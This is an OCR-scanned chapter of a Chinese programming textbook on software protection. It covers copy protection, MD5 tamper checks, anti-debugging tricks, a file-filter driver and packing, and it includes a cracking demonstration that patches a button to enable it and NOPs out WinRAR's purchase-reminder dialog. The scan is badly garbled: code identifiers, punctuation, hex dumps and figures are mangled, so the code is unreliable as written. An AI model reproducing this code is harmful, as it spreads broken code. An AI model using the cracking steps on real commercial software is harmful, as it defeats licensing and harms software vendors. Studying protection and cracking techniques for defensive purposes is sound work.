把 第 1 章 的 知识 用 到 这 里 来 。 


3. 应 用 程序 的 代码 


BOOL C 防 拷贝 安装 程序 App::InitInstance() 
t 
char macl[12]mac2[12]: 
GetFirstMac(mac1): 
CFilefp: // 读 保存 的 MAC 
if(!fp.Open("C:\\windows\\unique", CFile::modeRead)) 
return 0; 
fp.Read(mac2.12): 
fp.Close0: 
这 memcmp(macl.mac2.12))retum 0; /比较 ， 不 等 则 返回 


=< 


s 
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25 限定 运行 的 载体 和 路 径 


有 时 候 为 了 保护 知识 产权 ， 可 能 需要 限定 用 户 将 软件 在 光盘 上 运行 ， 也 可 能 需要 限定 
用 户 不 得 将 软件 找到 同一 台 机 器 安装 目录 的 其 他 地 方 运行 ， 需 要 做 一 些 限定 。 


1. 限定 载体 


限定 载体 的 原理 是 ， 程 序 运 行 时 取 自 己 对 应 程序 文件 的 全 路 径 ， 然 后 再 取 盘 符 ， 再 分 
析 盘 符 的 属性 , 如 果 不 是 光盘 , 就 退出 。 现在 以 限定 在 光盘 运行 为 例 。 GetModuleFileNameA 
函数 获取 进程 对 应 文件 路 径 ，GetDriveType 函数 获取 盘 符 的 属性 。 


// 取 全 路 径 
char path[260]: 
:GetModuleFileNameA(NULL.path.260): 
//::MessageBox(0.path;.NULL.MB OK): 
path[3]=0; /截断 字符 串 得 到 盘 符 
UINT type-GetDriveType(path): // 取 盘 符 属性 


if(type!-DRIVE CDROM){ // 如 果 不 是 光盘 ， 则 退出 
:MessageBox(0." 必 须 在 光盘 运行 "NULLIMB_OK): 
return 0; 


) 
2. 限定 路 径 下 运行 
原理 是 程序 启动 时 取 当 前 路 径 与 设 定 的 路 径 对 比 ， 不 等 则 退出 。 比 如 ,将 winword.exe 
复制 到 其 他 文件 夹 ， 它 是 不 会 运行 的 。 
BOOL C 限定 载体 App::InitInstanceO 
{ 
// 取 全 路 径 
char *pset="c:\\aaaa.exe"; // 假 设 这 是 安装 设 定 的 路 径 
char path[260]: 
::GetModuleFileNameA(NULL. path.260): 
CString sl=pset; 
CString s2-path: 
if(s1!-s2)retum 0: 


2.6 SERO EEC 


软件 的 防 算 改 分 为 文件 防 算 改 和 加 载 到 内 存 以 后 防止 内 存 代码 和 数据 被 算 改 。 防 算 改 
可 以 使 用 CRC EÈ MDS 算法 。 
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264 ”程序 文件 的 防 自 改 


安装 程序 可 以 把 应 用 程序 的 MD5 值 写 入 到 应 用 程序 的 某 个 地 方 ， 例 如 程序 最 后 或 文 
件 头 中 ， 应 用 程序 运行 时 获取 自己 的 MD5 值 ， 与 保存 在 文件 中 的 MDS 值 进行 比较 ， 不 等 
则 退出 。 本 节 这 样 模拟 : 安装 程序 计算 应 用 程序 的 MDS 值 (不 包括 最 后 16 字 节 )， 写 入 到 
应 用 程序 的 最 后 16 字 节 (最 后 16 字 节 一 般 纯粹 只 有 对 齐 用 ， 无 其 他 用 途 )。 应 用 程序 运行 
时 ,计算 自己 的 MD5 值 (不 包括 最 后 16 字 节 ), 与 最 后 16 字 节 比较 。 应 该 是 先生 成 应 用 程 
序 ， 然 后 安装 程序 去 设 定 应 用 程序 的 MD5 fi. 

1. 应 用 程序 中 的 MD5 值 判 断 


BOOL C 应 用 程序 MDS 值 判断 App::TnitInstance() 
{ 
char path[2560]: 
:GetModuleFileNameA(NULL. path, 260); ” // 取 自己 的 全 路 径 
CFile fp: 
fp.Open(path, CFile:modeRead) /只 读 方式 打开 (只 能 是 该 方式 ) 
int len=(int)fp.GetLength(y: 
BYTE *p=new BYTE[len]: 
fp.Read(p.len): 
fp.Close(): 
md5 myMds: 
myMds.Update((uchar*)p.len-16); /计算 MDs 值 ， 但 不 包括 最 后 16 字 节 
myMd5.Finalize0; 
这 memcmp(myMd5.DigestO.p+len-16.16)){ //Md5 值 与 最 后 16 字 节 比较 
delete []p: 
:MessageBox(0," 代 码 被 算 改 "," 错 误 ".MB_OK); 
return 0; 
} 
:3MessageBox(0." 代 码 完整 "NULL,MB_OK); 
delete []p: 


2. 安装 程序 设 定 应 用 程序 的 MDS 值 


void C 安装 程序 设 定 应 用 程序 MDS (ñ Dlg::OnBnClickedButton10 
í 
CFile fp: 
印 .Open("D:Nmyproc\ 应 用 程序 MDS 值 判断 \Release\ 应 用 程序 MDS 值 判 断 .exe", 
CFile:modeReadWrite); /可 读 可 写 方式 打开 
int len=(int)fp.GetLengthO: 
BYTE *p=new BYTE[len]: 
fp.Read(p.len): 
md5 myMds: 
myMdsS.Update((uchar*)p.len-16): // 计 算 MDS 值 ， 但 不 包括 最 后 16 字 节 
myMd5.Finalize(): 
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印 .Seekden-16.CFile::begin): /把 指针 移 到 最 后 16 字 节 处 
fp.WritemyMDS.Digest.16); // A MDs 值 
fp.Close0: 
delete []p: 
) 


262 ”程序 的 内 存 防 自 改 


可 执行 文件 被 加 载 到 内 存 后， 仍然 可 能 会 被 修改 。 防 算 改 的 方法 依然 是 计算 MDS fü, 
但 不 是 计算 文件 的 ， 而 是 计算 程序 内 存 的 。 在 所 附 代码 内 有 “PE 文件 格式 分 析 ”， 打 开 所 
举 的 例子 ， 可 以 看 到 如 图 2-6 所 示 的 结构 。 

从 图 2-6 可 以 看 出 ， 程 序 在 内 存 中 的 虚拟 基地 址 为 0X400000， 在 内 存 的 映像 长 度 为 
OXE000。 


程序 Hd5 值 判断 \Release\ 应 用 程序 Hd5 值 判断 . exe 


text 


的 名 字 .tex 
20 
的 家 | ity enr 


图 2-6 程序 内 存 映像 


程序 在 内 存 中 占用 的 空间 一 般 要 大 于 等 于 其 对 应 的 磁盘 文件 所 占用 的 空间 ， 具 体 请 参 
阅 2.8.2 节 PE 文件 结构 部 分 知识 。 这 里 必然 涉及 导入 表 内 容 的 变化 ， 解 压缩 ， 内 存 与 文件 
对 齐 的 不 同等 。 这 里 设计 的 程序 是 ， 在 程序 加 载 时 ， 计 算 程 序 内 存 映像 的 MDS 值 ， 然 后 
启动 定时 器 ， 每 分 钟 计算 一 次 MDS 值 ， 两 值 不 等 时 就 退出 。 

1. 在 程序 加 载 时 就 计算 一 次 MD5 值 

(1) 在 应 用 程序 *.cpp 文件 定义 全 局 变量 BYTE *pmd5=NULL; 

(0) 初始 化 时 计算 并 保存 内 存 MDS 值 。 

BOOL C 应 用 程序 MDS 值 判断 App::InitInstance() 


md5 myMd5: 

uchar*pp-(uchar*)0x400000; /内 存 映像 起 始 地 址 
myMd5.Update(pp.0xE000): /内 存 映像 的 长 度 为 OxE000 
myMdsS.Finalize(): 

pmds=new uchar[16]: // 分 配 内 存 存 放 内 存 映像 的 MD5 (ñ 
memcpy(pmd5. myMd5.DigestO.16): 


G) 在 对 话 框 类 文件 *dlg.cpp 文件 中 先 引 用 应 用 程序 中 定义 的 全 局 变量 : 


extem BYTE *pmds: 
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然后 建立 定时 器 
BOOL C 应 用 程序 Md5 值 判 断 Dlg::OnIitDialog0 


SetTimer(11.60000.NULL): 
retum TRUE; / 除非 将 焦点 设置 到 控件 ， 和 否则 返回 TRUE 
) 
在 定时 器 消息 处 理 函数 中 增加 如 下 代码 进行 判断 : 


void C 应 用 程序 Mds 值 判断 Dlg::OnTimer(UINT PTR nIDEvent) 
í 

md5 myMd5; 

uchar*pp-(uchar*)0x400000; /内 存 映像 起 始 地 址 

myMd5.Update(pp.0xE000); /内 存 映像 的 长 度 为 OXEO00 

myMd5.Finalize0; 

这 memcmp(pmds, myMd5.Digest0.16)){ /比较 ， 不 等 就 退出 
z:ExitProcess(0); 

k 
CDialog::OnTimer(nIDEvent); 
) 


详细 代码 见 “ 安 装 程序 设 定 应 用 程序 Md5 值 ” 和 “应 用 程序 Md5 值 判断 ”。 


注意 : 


计算 内 存 MDS 时 不 可 包含 全 局 变量 和 静态 变量 的 数据 区 。 


27 软件 的 防 调试 


为 了 破解 或 获取 软件 的 关键 代码 ， 有 可 能 被 反 汇编 。 反 汇编 分 为 静态 和 动态 反 汇 编 。 
反 静 态 调试 可 以 采用 诸如 花 指令 的 方式 进行 反 汇编 ,反动 态 调试 可 以 采用 诸如 分 析 父 进程 、 
计算 代码 运行 时 间 差 、 分 析 软 件 运行 是 否 处 于 调试 状态 等 方式 来 进行 。 


2.7.1 使 用 花 指令 


喜欢 分 析 破 解 别人 软件 的 人 眼睛 总 有 累 的 时 候 ， 于 是 用 静态 分 析 软 件 如 W32Dasm 将 
程序 反 汇 编 出 来 保存 ， 甚 至 打印 在 纸 上 以 后 慢 慢 分 析 。 然 而 有 程序 员 发 现 ， 如 果 在 程序 中 
掺 杂 一 些 采 用 “ 跳 转 指令 加 数据 ”的 代码 ， 可 以 局 部 破坏 软件 反 汇编 ， 这 就 是 所 谓 “ 花 指 
令 ”。 代 码 格 式 可 以 表示 为 : 

这 Do_It;， 若 标志 位 ZF=1， 跳 转 到 Do It 

jnzDo It; 若 标 志 位 ZF=0， 跳 转 到 Do_It， 所 以 总 是 跳 转 到 一 个 位 置 

db 0; 定义 一 字 节 变量 ， 以 干扰 后 面 的 反 汇编 ， 也 可 为 别 的 值 ， 值 不 同 则 效果 不 同 
Do It; 标号 
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这 几 行 代码 除了 干扰 正确 反 汇 编 结果 ， 无 其 他 作用 。 以 下 面 的 代码 为 例 ， 如 果 将 代码 
作 以 下 改动 : 
ifuMsg = WM TIMER 


jzDo It ; 新 添加 的 
jnz Do It ; 新 添加 的 
db Oh ; 新 添加 的 
Do It: ; 新 添加 的 
if wParam = 1 
„if TimeOut = 20 
invoke SendMessagehWin.WM_SYSCOMMAND.SC_ CLOSENULL 
else 
inc TimeOut 
endif 
endif 
endif 


反 汇编 的 结果 如 图 2-7 所 示 ， 框 内 的 代码 是 错误 的 代码 。 

由 于 花 指 令 有 一 定 的 格式 ， 有 经 验 的 分 析 人 员 很 容易 识别 。 如 上 例 ， 若 将 嵌入 的 花 指 
令 全 部 改 为 90h(nop， 空 操作 指令 )， 再 反 汇编 ， 结 果 就 正确 了 。 大 量 的 花 指令 使 用 可 增加 
分 析 破 解 人 员 的 时 间 。 


图 2-7 使 用 花 指令 后 的 反 汇编 代码 


272 ”软件 状态 分 析 
微软 给 用 户 提供 了 一 个 API 函数 IsDebuggerPresent， 用 来 检测 当前 程序 是 否 正 在 被 调 
试 。 返 回 值 为 TRUE 时 ， 则 说 明 当 前 程序 正在 被 调试 。 若 有 如 下 代码 : 


BOOL C 检测 是 否 被 调试 App::InitinstanceO) 
í 
这 IsDebuggerPresentO)::ExitProcess(0): /为 调试 状态 ， 则 退出 


在 如 图 2-8 所 示 中 调试 时 ， 无 法 见 到 窗口 。 


。34。 
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J.Ping W32Dasm RE 9.00 程序 反 汇 编 /调试 工具 


Code Offset = 00000400, Code Size = 00001200 
Data Offset = 00002A00, Data Size = 00000200 


: 00001200 Flags: 600 
00001400 Flags: 400 


图 2-8 ”调试 程序 


273 与 文件 过 滤 驱 动 相 结 合 
如 果 应 用 程序 与 驱动 相 结 合 ， 由 驱动 来 监控 应 用 程序 的 状态 ， 那 是 比较 安全 的 一 件 事 


情 。 下 面 的 MiniFilter 程序 监控 应 用 程序 被 谁 打开 。 除 了 资源 管理 器 和 CMD.EXE， 


程 都 禁止 打开 它 。 
1. 定义 获取 进程 函数 


NTSTATUS GetProcessFullName(IN OUT PUNICODE STRING ProcName) 


t 


int pebOffeset=0x1b0; 
int RTLUSERPROCESSPARAMETERSOffset- 0x010; 
int imagePathNameOffset=0x038; 
NTSTATUS status-STATUS UNSUCCESSFUL: 
PEPROCESS peCurProc: 
ULONG* dwAddress; 
peCurProc-PsGetCurrentProcess();//EPROCESS 
dwAddress-(ULONG*)peCurProc: 
if(dwAddress!-NULL) 
í 
dwAddress=*((ULONG**)dwAddress+pebOffeset/sizeof(ULONG)): 
if(dwAddress-NULL) í 


dwAddress=*((ULONG**)dwAddress+RTLUSERPROCESSPARAMETERSO 


ffset /sizeof(ULONG)): 
if(dwAddress!-NULL) 
{ 


*ProcName-*((UNICODE STRING*)dwAddress+imagePathNameOffset/sizeof 


(UNICODE STRING))://PEB->ProcessParameters->ImagePathName( 
_UNICODE_STRING) 
status=STATUS_SUCCESS: 

) 


他 进 
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) 


return status; 


) 
这 个 函数 可 以 获取 被 打开 的 文件 的 全 路 径 。 这 部 分 代码 的 编译 和 执行 ， 请 参阅 3.5.1 
节 中 提 到 的 驱动 程序 部 分 。 


FLT PREOP CALLBACK STATUS NPPreCreate ( 
. inout PFLT CALLBACK DATA Data, 
. inPCFLT RELATED OBJECTS FltObjects, 
. Geref out opt PVOID *CompletionContext 
) 


WCHAR FileName[260]- (0) : /文件 名 
WCHAR pFileName[260]-(0): ”// 进 程 名 
PUNICODE STRING driver; // 盘 符 ， 为 DiskVolumel 等 
GET NAME CONTROL nameControl: 
driver = SfGetFileName(FltObjects--FileObject.Data-"IoStatus.Status,&nameControl); / 盘 符 
ifdriver—NULL)retum FLT PREOP SUCCESS NO CALLBACK: 
— try {// 出 错 在 此 ， 有 了 时候 不 能 拷贝 内 存 。 
RtlZeroMemory(FileName,520): 
RtlCopyMemory(FileName,ptr1,Data-»Iopb-» TargetFileObject-^FileName.Length): 
) 
. eXcep(EXCEPTION EXECUTE HANDLER) { 
DbgPrint(" 获 取 文 件 出 错 --%Sm".ptrl): 
retum FLT PREOP SUCCESS NO CALLBACK: 
) 
RtllnitUnicodeString(&fpath.FileName): 
RitIUpcaseUnicodeString(&fpath.&fpath.FALSE)/ 得 到 大 写 的 文件 路 径 
if(STATUS_SUCCESS!=GetProcessFullName(&ProcName))goto f end: 
— try {// 出 错 在 此 ， 有 时 候 不 能 拷贝 内 存 。 
RtlZeroMemory(pFileName.520): 
RtlCopyMemory(pFileName.ProcName.Buffer.ProcName.Length): 
) 
. eXcep(EXCEPTION EXECUTE HANDLER) ( 
DbgPrint(" 获 取 进程 出 错 --%Sm'".ProcName Buffer): 
return চা. PREOP_SUCCESS_ NO CALLBACK: 
) 
RtlInitUnicodeString(&ppath.pFileName): 
RtlUpcaseUnicodeString(&ppath.&ppath.FALSE):// 得 到 大 写 的 进程 路 径 
RtlUpcaseUnicodeString(driver.driver. FALSE): 
// 假 设 受 保护 的 程序 的 路 径 为 C:\aaa.exe 
// 则 有 下 面 的 判断 
if(wcsstr(FileName."\AAA EXE")>0 && wcsstr(driver. 
"HARDDISKVOLUME1")>0) 
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if(wcsstr(pFileName."EXPLORER EXE")>0 || wcsstr(pFileName."CMD.EXE")>0 ) 
retum FLT PREOP SUCCESS NO CALLBACK: 
else ( 
/如 果 想 打开 C:Waaaexe， 但 打开 的 进程 不 是 资源 管理 器 和 控制 台 ， 则 拒绝 

Data->IoStatus.Status = STATUS ACCESS DENIED: 
Data->IoStatus Information = 0: 
retum FLT PREOP COMPLETE: 

) 


2.8 ”软件 的 加 密 ( 加 壳 ) 


有 些 软件 里 有 一 段 专门 负责 保护 软件 不 被 非法 修改 或 反 编译 的 程序 ， 它 们 先 于 程序 运 
行 取得 控制 权 ， 然 后 完成 保护 软件 的 任务 ， 就 像 植物 的 壳 一 样 包 在 果实 外 面 保护 果实 ， 这 
就 是 所 谓 的 “ 壳 ” 程 序 。 

运行 加 过 壳 的 程序 时 ， 用 户 执行 的 实际 上 是 这 个 外 壳 的 程序 ， 而 这 个 外 壳 程 序 负责 把 
用 户 原来 的 程序 在 内 存 中 解压 缩 ， 并 把 控制 权 交还 给 解 开 后 的 真正 的 程序 。 由 于 一 切 工作 
都 是 在 内 存 中 运行 ， 用 户 根本 不 知道 也 不 需要 知道 其 运行 过 程 。 

壳 程 序 的 原理 是 通过 自 建 导入 表 (Import Table) 实 现 。 程 序 中 调用 的 API 函数 ， 是 程序 
执行 时 通过 PE 导入 表 可 以 得 到 API 函数 的 地 址 ， 从 而 使 程序 能 够 正常 运行 。 那 么 当 对 程 
序 加 壳 后 ， 壳 程序 中 所 调用 的 API 函数 在 执行 时 都 是 通过 自 建 导入 表 、 壳 程序 本 身 再 将 原 
导入 表 导 入 的 方法 使 过 程序 能 够 正常 运行 ,基于 此 原理 ,有 很 多 流行 的 加 壳 工具 如 ASPack、 
UPX、WWPack32 等 ， 在 互联 网 上 也 能 找到 。 

既然 有 加 壳 工 具 , 也 有 将 加 壳 软 件 还 原 的 脱 壳 软 件 , 如 给 UPX 脱 壳 的 软件 叫 UNUPX。 
- 般 情况 下 ， 用 某 种 加 壳 工 具 给 某 个 软件 加 壳 后 ， 都 会 留 下 加 壳 工 具 的 印记 。 如 图 2-9 所 
示 就 是 用 UPX 加 壳 后 的 部 分 反 汇 编 代 码 ， 可 以 看 到 “UPX” 字 符 串 。 


TES Ea Ft t P Ea a d PE a] 


2-9 MIE SUL 


加 壳 是 个 复杂 的 过 程 。 本 节 只 介绍 一 般 的 加 密 。 
2.8.1 软件 的 破解 演示 


1. 将 一 个 按钮 由 灰 变 亮 
有 些 软件 在 没有 注册 时 有 功能 限制 ， 比 如 下 面 的 按钮 。 下 面 通过 修改 代码 使 其 变 亮 。 
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用 Win32Dasm 反 汇 编 工 具 打 开 该 程序 。 按 钮 的 控制 是 使 用 函数 EnableWindow， 那 么 
这 里 在 工具 中 找到 该 函数 ， 如 图 2-10 所 示 。 然 后 双击 该 函数 ， 可 以 看 到 如 图 2-11 所 示 的 
信息 。 


mm J.Ping V32Dasx 版 本 9. GRIA 


1320 sadi À. 函数 清单 
双击 文本 ,查找 函数 所 对 | 


জজ 
MSYCRT. exit 
WSER32. GetSystenlletrics 
WSER32. IsIconic 


图 2-10 ”找到 要 修改 的 函数 


:004012ED GA00 push 00000000 
:004012EF 51 push ecx 


* Reference To: USER22.EnableWindcw, Ord:00E7h 
I 
1004012F0 FF15E8214000 Call dword ptr [00402150] 


Code Offset = 00001000, Code Size = 00001000 


图 2-11 函数 的 反 汇编 代码 


把 内 存 004012EDH 处 的 push 0 改 为 push 1; 机 器 码 由 6A 00 改 为 6A 01， 如 图 2-12 
所 示 。 

由 于 程序 在 内 存 的 起 始 地 址 为 400000H， 则 换算 成 文件 的 偏 移 位 置 为 12EDH。 

用 VC 以 二 进 制 打开 该 文件 ， 如 图 2-13 所 示 。 注意， 其 他 工具 不 能 同时 打开 它 。 


6 90 90 90 90 90 90 90 90 
86 A 


B8 DO 22 40 00 C3 9i 


将 6A 00 修改 为 6A01 


আছি ও) [Orau Jende 


| 
swe EEND obj | 


r Dt 


图 2-13 以 二 进 制 打开 
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push 0 修改 成 了 push 1, 也 就 是 让 EnableWindow 的 第 二 个 参数 为 TRUE。 这样 按钮 就 
变 亮 了 ， 如 图 2-14 所 示 。 


图 2-14 ”代码 修改 后 


程序 请 见 所 附 代码 的 “按钮 破解 ”。 
2. 修改 WinRAR 的 提示 框 


某 个 版 本 的 WinRAR 有 如 图 2-15 的 提示 框 。 通 过 反 汇 编 找到 位 置 ， 修 改 代码 后 可 以 
去 掉 它 。 


D - Finar (ARE) 


Y. AG) WREQ DID Hed 


ELETE 


图 2-15 winrar 的 提示 框 


由 于 对 话 框 的 显示 一 般 是 调用 函数 DialogBoxParamA, 因此 先 找到 这 个 函数 ,如 图 2-16 
所 示 ， 挨 个 查找 该 函数 的 调用 ， 如 图 2-17 所 示 。 反 汇编 计算 代码 在 文件 中 的 偏 移 如 图 2-18 
所 示 。 搜 索 图 2-17 中 看 到 的 字符 串 “68 08 A2 44 00”， 如 图 2-19 所 示 ， 即 可 看 到 数据 。 
把 对 应 DialogBoxParamA 函数 调用 的 代码 全 部 用 0x90 覆盖 ( 即 机 器 码 nop 覆盖 ), 如 图 2-20 
所 示 。 关 闭 文件 ， 可 以 发 现 ， 提 示 要 求购 买 的 信息 消失 了 。 


2-16 查找 对 话 框 函数 


2-7. ”找到 该 位 置 


PE 该 程序 : 可 执行 -只 在 32 未 平台 运行 - 
PE IMAGE.OPTION HEADER 结构 
程序 执行 入 口 RVA: 0» 1000 


代码 的 节 起 始 RVA: 。 0x 1000 
数据 的 节 起 始 RVA: Ox 9F000 
程序 的 建议 装载 地 址 : Ox 400000 


内 存 中 整个 文件 映像 尺寸 : 0X 122000 
所 有 头 + 节 表 的 大 小 : 0x 600 


图 2-18 分 析 文 件 结构 


r 区 分 大 小 号 ED 

r প্রজার ME 
BRAHMI 

ae we 
Em 
25 


45160 
95178 


Ee DD 92 FC FF 85 CO 7 
7F 04 05 CO 7D 2A Ci 


图 2-19 搜索 特定 数据 串 


045140 4C 00 83 F8 28 7F 04 85 CO 7D 28 C6 85 AD 36 4A 
98 90 90 90 90 9G 90 90 90 90 90 90 90 9 
8 98 9G 9G 98 98 98 90 9O 9O 98 98 9G 
045170 3D ñC 36 4A 3D 70 3C 4C O| 
045180 13 06 05 AC 36 18 óA 00 óA 1 E8 
045190 1E 92 05 00 83 3D óC 3C 4C 00 75 2D 83 3D 64 


图 2-20 将 函数 调用 的 代码 覆盖 


程序 在 所 附 代码 中 的 “(破解 前 ) 带 提示 框 的 _winrar”。 
2.8.2 ”软件 的 加 密 
本 节 使 用 异 或 来 对 一 个 可 执行 文件 的 代码 部 分 进行 异 或 加 密 ， 使 反 汇编 时 看 不 到 被 调 


用 的 函数 。 


০39০ 
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1. 简单 地 分 析 PE 文件 结构 


所 有 Windows 可 执行 文件 简称 PE 文件 。PE 文件 必须 以 一 个 简单 的 DOS MZ header 
开始 (字母 “MZ”)， 常 常 称 之 为 DOS 头 ， 它 既是 描述 DOS 下 exe 文件 的 头 结构 ， 同 时 结 
构 中 有 一 个 字段 指向 描述 Windows 下 可 执行 文件 的 结构 体 .有 了 DOS 3k, 一旦 程序 在 DOS 

下 执行 , DOS 就 能 识别 出 这 是 有 效 的 执行 体 , 然后 运行 紧 随 MZ header 之 后 的 DOS stub。 
DOS stub 实际 上 是 个 DOS 下 的 有 效 的 可 执行 代码 , 在 不 支持 PE 文件 格式 的 操作 系统 DOS 

下 运行 , 它 将 显示 一 个 错误 提示 , 通常 调用 中 断 21h 的 功能 9 来 显示 字符 串 “This program 
cannot run in DOS mode”， 然 后 退出 程序 。 可 以 在 debug FH U 命令 看 到 它 的 内 容 。 整 个 
PE 结构 如 图 2-21 所 示 。 

IMAGE DOS HEADER 大 小 为 64 字 节 。 结 构 中 的 两 个 字段 最 重要 : 一 是 e_ magic, 
如 果 它 不 是 “MZ”，Windows 的 装载 器 就 不 会 执行 它 ; 二 是 elfanew， 它 会 指示 装载 器 
去 找到 Windows 下 的 执行 体 ， 描 述 的 是 后 面 的 PE 头 在 文件 中 的 字 节 偏 移 值 。 

PE 头 结构 IMAGE_NT_HEADERS， 用 汇编 语言 描述 如 下 : 

IMAGE NT HEADERS STRUCT 
Signature dd — ? 准 字 节 ,标记 为 "PE\0\0" 
FileHeader IMAGE FILE HEADER 一 :20 字 节 
OptionalHeader IMAGE OPTIONAL HEADER32 一 224 字 节 
IMAGE NT HEADERS ENDS 

Signature Jj dword 7574, {HX 50h. 45h, 00h, O0h(PEW90), 39 PE 文件 标记 。 可 以 只 

识别 给 定 文件 是 否 为 有 效 PE 文件 。 


| IMAGE DOS HEADER 结构 [Dos MZ 文件 1 头 
DOSEN 
可 分 | DOS Stub DOS 块 
“PE”, 0, 0 PE 文件 头 标志 
PE 文 IMAGE_FILE_HEADER 结 构 “| PE 文件 表 头 
件 头 IMAGE OPTIONAL HEADER32 
GE DATA DIRECTORY£É 13 
节 表 一 
与 节 [ 
xx 
应 的 
节 数 
据 
LR 
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FileHeader 结构 域 包含 了 关于 PE 文件 物理 分 布 的 信息 , 比如 节 数 目 、 文 件 执行 机 器 等 。 
OptionalHeader 结构 域 包含 了 关于 PE 文件 逻辑 分 布 的 信息 。 
MAGE FILE HEADER 结构 共 20 字 节 ， 用 汇编 语言 描述 如 下 : 
IMAGE FILE HEADER struct( E 
USHORT Machine :运行 的 平台 ， 对 于 Intel， 该 值 为 014CH 
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USHORT NumberOfSections :文件 的 节 数 目 
ULONG  TimeDateStamp :文件 创建 日 期 ， 时 间 
ULONG  PointerToSymbolTable :执行 符号 表 ， 调 试用 
ULONG  NumberOfSymbols :符号 表 中 符号 数量 ， 调 试用 
USHORT SizeOfOptionalHeader :OptionalHeader 结构 大 小 
USHORT Characteristics :文件 信息 标记 ， 比 如 文件 是 exe 还 是 dl 


IMAGE FILE HEADER ends 
该 结构 中 最 重要 的 字段 是 NumberOfSections， 描 述 文件 中 节 的 数目 。 节 是 PE 结构 的 
-个 重要 概念 ， 编 译 器 对 源 代码 编译 时 ， 将 属性 相同 的 数据 集中 到 一 个 连续 物理 块 区 ， 称 
之 为 节 。 例 如 可 执行 代码 具有 可 执行 和 可 读 属性 ， 放 在 一 个 节 内 ， 定 义 的 全 局 变量 具有 可 
读 可 写 属 性 。 如 果 要 为 文件 增加 或 删除 一 个 节 ， 就 需要 修改 这 个 值 。 定 位 到 PE 的 各 个 节 
也 需要 用 到 该 字段 。 
IMAGE OPTIONAL HEADER32 结构 有 224 字 节 ， 包 含 了 PE 文件 的 逻辑 分 布 信息 ， 


描述 如 下 : 


IMAGE OPTIONAL HEADER STRUCT 


USHORT 
UCHAR 
UCHAR 
ULONG 
ULONG 
ULONG 
ULONG 
ULONG 
ULONG 
ULONG 
ULONG 
ULONG 
USHORT 
USHORT 
USHORT 
USHORT 
USHORT 
USHORT 
ULONG 
ULONG 
ULONG 
ULONG 
USHORT 
USHORT 
ULONG 
ULONG 
ULONG 


Magic 
MajorLinkerVersion 
MinorLinkerVersion 
SizeOfCode 
SizeOflnitializedData 
SizeOfUninitializedData 
AddressOfEntryPoint 
BaseOfCode 
BaseOfData 

ImageBase: 
SectionAlignment 
FileAlignment 
MajorOperatingSystemVersion 
MinorOperatingSystemVersion 
MajorImageVersion 
MinorlImageVersion 
MajorSubsystemVersion 
MinorSubsystemVersion 
Reserved] 

SizeOflmage 
SizeOfHeaders 
CheckSum 

Subsystem 
DliCharacteristics 
SizeOfStackReserve 
LoaderFlags 
NumberOfRvaAndSizes 


:为 224 字 节 


:所 含 代码 的 总 字 节 数 

: 含 已 初始 化 数据 的 总 字 节 数 
: 含 未 初始 化 数据 的 总 字 节 数 
:PE 文件 的 入 口 地 址 
:代码 节 的 起 始 RVA 
:数据 节 的 起 始 RVA 
:整个 程序 的 虚拟 基地 址 

: 调 入 内 存 后 节 数据 对 齐 粒 度 
:文件 中 节 数 据 对 齐 粒 度 


:可 运行 操作 系统 最 小 版 本 


:可 运行 操作 系统 最 小 子 版 本 


:内 存 中 整个 映像 尺 十 


:所 有 头 + 节 表 描述 项 文件 大 小 


:是 为 控制 台 程序 (CUD, 或 GUI 
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IMAGE DATA DIRECTORY DataDirectory[16] 
IMAGE OPTIONAL HEADER ENDS 
重要 字段 介绍 如 下 : 
e ImageBase 指出 PE 文件 装载 的 虚拟 地 址 VA(Virual Address). Windows 程序 运行 
在 保护 模式 下 ， 在 保护 模式 下 ， 程 序 访问 存储 器 所 使 用 的 逻辑 地 址 称 为 虚拟 地 址 。 
比如 ， 如 果 该 值 是 400000h，PE 装载 器 将 尝试 把 文件 装 到 虚拟 地 址 400000h 开始 
的 逻辑 空间 。 字 眼 “ 优 先 ” 表 示 若 该 地 址 区 域 已 被 其 他 模块 占用 ， 那 PE 装载 器 会 
选用 其 他 空闲 地 址 。 对 exe 文件 来 说 ， 装 载 到 内 存 后 ， 该 值 和 文件 中 的 值 是 一 致 
的 ， 对 dll 文件 来 说 ， 未 必 一 致 。 
e  AddressOfEntryPoint 为 准备 运行 的 PE 文件 的 相对 入 口 地 址 ， 即 第 一 个 指令 的 
RVA(Relative Virual Address)。 相 对 虚拟 地 址 (RVA) 表 示 数 据 在 内 存 中 相对 于 虚拟 
基地 址 的 偏 黎 。 相 对 虚拟 地 址 (RVA) 等 于 虚拟 地 址 (VA) 减 去 基 址 (ImageBase)。 若 
病毒 要 改变 整个 执行 的 流程 ， 可 以 将 该 值 指定 到 新 的 RVA， 这 样 新 RVA 处 的 指 
令 首先 被 执行 。 
° FileAlignment 指定 了 文件 中 节 对 齐 的 字 节 长 度 单位 。 例 如 ， 如 果 该 值 是 200h8， 那 
么 每 节 的 字 节 长 度 必 须 是 200h 的 倍数 。 若 某 节 从 文件 偏 移 量 600h 开始 且 实际 大 
小 是 10 个 字 节 ， 则 文件 下 一 节 必 定位 于 偏 移 量 800h， 即 偏 移 量 600H 和 800H 之 
间 还 有 800h-10 字 节 没 被 使 用 。 
e SectionAlignment 指定 了 节 被 装 入 内 存 后 的 字 节 长 度 单 位 。 例 如 ， 如 果 该 值 是 
1000h， 那 么 每 节 的 字 节 长 度 必须 是 1000h 的 倍数 。 若 第 一 节 从 401000h 开始 且 大 
小 是 10 个 字 节 ， 则 下 一 节 必 定 从 402000h 开始 ， 即 使 401000h 和 402000h 之 间 还 
有 很 多 空间 没 被 使 用 。 
由 上 面 分 析 可 知 ， 如 果 要 简单 地 分 析 一 个 文件 是 否 为 PE 格式 可 执行 文件 ， 过 程 为 : 
(1) 检验 文件 头 部 第 一 个 字 的 值 是 否 等 于 “MZ”， 是 则 DOS 头 有 效 。 
(2) Jl] DOS 头 的 字段 e lfanew 来 定位 PE ko 
(3) 比较 PE 头 的 第 一 个 双 字 的 值 是 否 等 于 45500000H(“PE\0\0”)。 如 果 是 ， 那 就 粗 
略 认为 该 文件 是 一 个 有 效 的 PE 文件 。 比 较 详 细 的 判断 还 要 看 后 面 的 结构 分 析 。 

PE 头 后 面 是 节 表 (Section table), H] MAGE SECTION HEADER 描述 ， 共 40 字 节 。 
它 的 个 数 由 FileHeaderIMAGE FILE HEADER) 结构 中 字段 NumberOfSections 的 值 来 决 
定 。 节 表 与 后 面 的 节 数据 一 一 对 应 ， 用 来 定位 节 和 描述 节 的 属性 ， 描 述 如 下 : 


struct MAGE SECTION HEADER { 


UCHAR  Name[8] : 节 的 名 字 

union í 

ULONG PhysicalAddress: 

ULONG VirtualSize : 节 区 数据 的 实际 字 节 长 度 
)Misc: 

